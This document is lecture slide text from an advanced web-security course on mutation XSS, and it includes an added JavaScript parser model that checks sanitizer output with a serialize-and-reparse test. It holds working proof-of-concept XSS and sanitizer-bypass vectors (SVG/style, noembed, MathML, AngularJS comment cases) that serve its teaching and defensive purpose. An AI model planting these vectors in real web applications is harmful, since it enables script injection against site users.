![Page 1: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/1.jpg)
Web & Browser Security
Day Two: Advanced XSS
A lecture by Dr.-Ing. Mario Heiderich
[email protected] || [email protected]
This is the day where we cover crazy stuff. Crazy.
Our Dear Lecturer
● Dr.-Ing. Mario Heiderich
● Ex-Researcher and now Lecturer, Ruhr-Uni Bochum
● PhD Thesis about Client Side Security and Defense
● Founder & Director of Cure53
● Pentest- & Security-Firm located in Berlin
● Security, Consulting, Workshops, Trainings
● Ask for an internship if the force is strong with you
● Published Author and Speaker
● Specialized in HTML5, DOM and SVG Security
● JavaScript, XSS and Client Side Attacks
● Maintains DOMPurify
● A top notch JS-only Sanitizer, also a couple of other projects
● Can be contacted but prefers not to be
● [email protected]
● [email protected]
Act One
Advanced XSS
And, before we get started, let's think about Self-XSS.
And one kind of CSRF. And how we can abuse that.
[...]
Mutations in the DOM: mXSS
● This attack is basically a nightmare come true. Browsers turned against webapps.
● Imagine, the browser turns harmless HTML into dangerous attack vectors.
● The server will assume sane markup and no risk
● This issue indeed exists, first reported in 2006
● „Broken Print-Preview“ http://is.gd/fLVScq
● String-Mutation in certain DOM properties
● Result: µXSS, mXSS or “Mutation XSS”
● Back then, affected applications and libraries:
● 2+ Million libraries according to Github
● 6+ vector classes, affect webmailers, everyone with a RTE
● Yahoo! Mail, OWA, Hotmail, Sharepoint, etc.
● And DOMPurify of course, massively so
● Let's have a closer look at this!
Yay! DEMO
Or, to be more clear
● Attacker submits HTML
● Server receives it to sanitize
● Says: that looks safe, all fine
● Sends it back to browser
● Browser receives HTML
● Renders it initially, all fine
● Some DOM logic fiddles with it
● Browser re-renders, HTML mutates
● Injected JavaScript activates and fires
New Variations
Both vectors identified and published by Gareth Heyes
<%/z=%><p/onresize=alert(1)//>
<div='/x='><iframe/onload=alert(1)>>
Other Browsers
Firefox cannot be trusted with innerHTML and SVG
<script>document.write('<svg><p><style><img
src="</style><img src=x onerror=alert(1)//">')
</script>
Chrome cannot be trusted with Unicode (sadly fixed in Chrome 62)
<a href= javascript:alert(1)>CLICK
Other Browsers
Chrome recently fixed another mXSS problem
<math><annotation-xml encoding="text/html"><xmp></xmp><img src=x onerror=alert(1)></xmp></annotation-xml></math>
Check out the video! https://is.gd/oRNBLZ
And all the code! https://is.gd/SdP0SK
But it gets worse
● Autumn 2019 was mXSS season. Sadly for us.
● DOMPurify got hit by a good dozen of bypasses
● First found by a 3rd party, Michał Bentkowski
● The rest then found “internally”
● There were two root causes
● An internal switch in document types changes the parser type
● A sudden change in document structure changes the parser type
mXSS Root-Cause One
● An internal switch in document types changes the parser type
● The browser thinks it’s XML, then thinks it’s HTML
● Once that “reconsideration” happens, HTML gets interpreted differently
● This causes bypasses, even and especially in DOM sanitizers like DOMPurify
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<svg><p></p><style><a id="</style><img src=1 onerror=alert(1)>">
mXSS Root-Cause Two
● A sudden change in document structure changes the parser type
● The switch is triggered by, for example, element removal
● Browser thinks XML, element gets removed, browser now thinks HTML
● And as that happens, the HTML gets interpreted differently
<noembed><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>
This element we don’t want, let’s remove it.
removed<svg><b><style><b title='</style><img src=x onerror=alert(1)>'>
And boom, we force the parser into XML-mode because SVG. Harmless becomes harmful.
removed<svg></svg><b></b><style><b title='</style><img src=x onerror=alert(1)>'>
Mutations are here to stay
● We can observe that mutations cannot be avoided
● Problem one: Capability changes
● NoScript, NoEmbed and the likes
● Problem two: Context changes
● From SVG to HTML and back, MathML
● Problem three: Node Removals
● Forcing the above using node removal
● These problems are hard to tackle and will likely accompany us until we have something better than HTML
AngularJS mXSS Corner Case
● In recent AngularJS versions, we can observe an interesting mXSS corner case
● This time it's based on unsafe handling of document.createComment()
<!doctype html>
<html ng-app>
<head><script src="angular.min.js"></script></head>
<body>
<b class="ng-include:'somefile?--><svg/onload=alert(1)>'">HELLO</b>
<button onclick="body.innerHTML+=1">do the mXSS thing</button>
</body>
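Root-cause one (the `<svg></p><style>` vector from the earlier slides) and the comment case on this slide share one mechanism: the browser serializes a tree the sanitizer approved, and that string re-parses into a different tree. The following is an added example, not code from the lecture, from DOMPurify or from AngularJS. It models only as much of the HTML parser as those two cases need (HTML raw-text `<style>` versus `<style>` inside `<svg>`, a stray `</p>` becoming an empty `<p></p>`, a `<p>` start tag breaking out of foreign content, comment data ending at the first `-->`) and then runs the round-trip check a sanitizer can add on top of its allow-list: parse, serialize, parse again, and reject output that is not stable or that gains an event-handler attribute on the second pass. The breakout-element subset, the flat token stream and the sample inputs are assumptions made for this example; a real sanitizer should run this check with the browser's own parser rather than a model.

```javascript
// Added example, not code from the lecture, DOMPurify or AngularJS. A minimal
// model of the HTML parser covering only what the lecture's vectors need:
//   - HTML context: <style> content is raw text up to the next "</style".
//   - SVG context (foreign content): <style> is an ordinary element, so an
//     attribute value may contain "</style>" without closing anything.
//   - A stray </p> with no open <p> yields an empty <p></p>, left inside the
//     open <svg> (the lecture's serialized form shows "<svg><p></p>").
//   - A <p>, <div>, <b> or <body> start tag inside <svg> breaks out of foreign
//     content (a subset of the spec's breakout list; assumption for this model).
//   - Comment data runs up to the first "-->" and is serialized verbatim.

const TAG_RE = /^<(\/?)([a-zA-Z][\w-]*)((?:[\s/]+[\w-]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)[\s/]*>/;
const ATTR_RE = /([\w-]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
const BREAKOUT = new Set(['p', 'div', 'b', 'body']);

// Parse markup into a flat token stream; `foreign > 0` means "inside <svg>".
function modelParse(markup) {
  const tokens = [];
  let pos = 0, foreign = 0, openP = 0;
  while (pos < markup.length) {
    if (markup.startsWith('<!--', pos)) {           // comment: data ends at first "-->"
      const close = markup.indexOf('-->', pos + 4);
      const end = close === -1 ? markup.length : close;
      tokens.push({ type: 'comment', data: markup.slice(pos + 4, end) });
      pos = close === -1 ? markup.length : close + 3;
      continue;
    }
    const m = markup[pos] === '<' ? TAG_RE.exec(markup.slice(pos)) : null;
    if (!m) {                                       // plain text up to the next "<"
      const next = markup.indexOf('<', pos + 1);
      const end = next === -1 ? markup.length : next;
      tokens.push({ type: 'text', data: markup.slice(pos, end) });
      pos = end;
      continue;
    }
    const [whole, slash, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    pos += whole.length;
    if (slash) {
      if (name === 'p' && openP === 0) {            // stray </p> becomes <p></p>
        tokens.push({ type: 'start', name: 'p', attrs: {} }, { type: 'end', name: 'p' });
      } else {
        if (name === 'p') openP -= 1;
        if (name === 'svg' && foreign > 0) foreign -= 1;
        tokens.push({ type: 'end', name });
      }
      continue;
    }
    while (foreign > 0 && BREAKOUT.has(name)) {     // HTML breakout tag closes <svg>
      tokens.push({ type: 'end', name: 'svg' });
      foreign -= 1;
    }
    const attrs = {};
    for (const a of rawAttrs.matchAll(ATTR_RE)) attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    tokens.push({ type: 'start', name, attrs });
    if (name === 'svg') foreign += 1;
    if (name === 'p') openP += 1;
    if (name === 'style' && foreign === 0) {        // HTML <style>: raw text until "</style"
      const close = markup.toLowerCase().indexOf('</style', pos);
      const end = close === -1 ? markup.length : close;
      tokens.push({ type: 'rawtext', data: markup.slice(pos, end) });
      pos = end;
    }
  }
  return tokens;
}

// Serialize like the HTML fragment serializer: text escapes & < >, attribute
// values escape & ", raw text and comment data are written back verbatim.
function modelSerialize(tokens) {
  const escText = (s) => s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
  const escAttr = (s) => s.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
  return tokens.map((t) => {
    if (t.type === 'text') return escText(t.data);
    if (t.type === 'rawtext') return t.data;
    if (t.type === 'comment') return '<!--' + t.data + '-->';
    if (t.type === 'end') return '</' + t.name + '>';
    const attrs = Object.entries(t.attrs).map(([k, v]) => ' ' + k + '="' + escAttr(v) + '"').join('');
    return '<' + t.name + attrs + '>';
  }).join('');
}

// Event-handler attributes in a token stream, as "element@attribute".
function handlers(tokens) {
  return tokens.flatMap((t) => t.type !== 'start' ? [] :
    Object.keys(t.attrs).filter((a) => a.startsWith('on')).map((a) => t.name + '@' + a));
}

// Round-trip check: serialize the tree the sanitizer approved, parse the result
// again and report what only exists after the second parse. `stable === false`
// or a non-empty `gained` means the output must be rejected.
function roundTripCheck(tokens) {
  const reparsed = modelParse(modelSerialize(tokens));
  const before = handlers(tokens);
  return {
    stable: modelSerialize(tokens) === modelSerialize(reparsed),
    gained: handlers(reparsed).filter((h) => !before.includes(h)),
  };
}

// Root-cause one: on the first parse <style> sits inside <svg>, so the onerror
// is just text inside an id attribute; after serialization <p> breaks out of
// <svg>, <style> becomes raw text and the <img> is a real element.
const svgVector = '<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">';
console.log(roundTripCheck(modelParse(svgVector)));      // stable: false, gained: [ 'img@onerror' ]

// AngularJS case: the directive text becomes comment data (constructed to
// mirror the slide); "-->" inside it ends the comment when body.innerHTML is
// serialized and re-parsed.
const commentData = "ng-include:'somefile?--><svg/onload=alert(1)>'";
console.log(roundTripCheck([{ type: 'comment', data: commentData }]));  // stable: false, gained: [ 'svg@onload' ]
```

The check deliberately compares the full serialization, not only handler attributes: a mutation that changes element nesting without creating a handler is still a parser-context switch and is worth rejecting, because the next round of DOM fiddling may be the one that turns it live. Writing comment data through `document.createComment()` needs the same discipline: data containing `-->` cannot survive a serialize/re-parse cycle intact.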
[...]
Day Two: Done
● Thanks a lot!
● Tomorrow, more.
● Any questions? Ping me.